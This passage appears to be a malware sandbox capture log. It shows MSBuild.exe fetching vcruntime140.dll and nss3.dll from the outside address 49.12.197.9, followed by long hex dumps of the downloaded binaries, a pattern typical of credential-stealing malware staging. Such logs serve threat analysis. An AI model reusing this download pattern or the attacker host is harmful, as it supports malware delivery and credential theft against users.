                                                                                                                                                                                                                    2024-10-03 13:14:56 UTC16384INData Raw: 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00
                                                                                                                                                                                                                    Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                                                                                                                                                                    2024-10-03 13:14:56 UTC16384INData Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00
                                                                                                                                                                                                                    Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                                                                                                                                                    2024-10-03 13:14:56 UTC16384INData Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15
                                                                                                                                                                                                                    Data Ascii: @]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
                                                                                                                                                                                                                    2024-10-03 13:14:56 UTC16384INData Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25
                                                                                                                                                                                                                    Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    15192.168.2.85625149.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:14:57 UTC200OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:14:57 UTC261INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:14:57 GMT
                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                    Content-Length: 80880
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Last-Modified: Thursday, 03-Oct-2024 13:14:57 GMT
                                                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    2024-10-03 13:14:57 UTC16123INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                                                                                                                                    2024-10-03 13:14:57 UTC16384INData Raw: 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c
                                                                                                                                                                                                                    Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
                                                                                                                                                                                                                    2024-10-03 13:14:57 UTC16384INData Raw: 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01
                                                                                                                                                                                                                    Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
                                                                                                                                                                                                                    2024-10-03 13:14:57 UTC16384INData Raw: d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f
                                                                                                                                                                                                                    Data Ascii: ttt@++t+t+u+uQ<0|*<9&w/c5~bASJCtv
                                                                                                                                                                                                                    2024-10-03 13:14:57 UTC15605INData Raw: 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f
                                                                                                                                                                                                                    Data Ascii: T@L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicro


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    16192.168.2.85625249.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:14:58 UTC192OUTGET /nss3.dll HTTP/1.1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:14:58 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:14:58 GMT
                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                    Content-Length: 2046288
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Last-Modified: Thursday, 03-Oct-2024 13:14:58 GMT
                                                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    2024-10-03 13:14:58 UTC16121INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                                                                                                                                    2024-10-03 13:14:58 UTC16384INData Raw: 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a
                                                                                                                                                                                                                    Data Ascii: kd)i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MA
                                                                                                                                                                                                                    2024-10-03 13:14:59 UTC16384INData Raw: 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45
                                                                                                                                                                                                                    Data Ascii: RQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                                                                                                                                                    2024-10-03 13:14:59 UTC16384INData Raw: 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10
                                                                                                                                                                                                                    Data Ascii: @@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
                                                                                                                                                                                                                    2024-10-03 13:14:59 UTC16384INData Raw: ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd
                                                                                                                                                                                                                    Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
                                                                                                                                                                                                                    2024-10-03 13:14:59 UTC16384INData Raw: 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3
                                                                                                                                                                                                                    Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
                                                                                                                                                                                                                    2024-10-03 13:14:59 UTC16384INData Raw: 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b
                                                                                                                                                                                                                    Data Ascii: d8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$
                                                                                                                                                                                                                    2024-10-03 13:14:59 UTC16384INData Raw: e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d
                                                                                                                                                                                                                    Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
                                                                                                                                                                                                                    2024-10-03 13:14:59 UTC16384INData Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff
                                                                                                                                                                                                                    Data Ascii: Y`P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
                                                                                                                                                                                                                    2024-10-03 13:14:59 UTC16384INData Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18
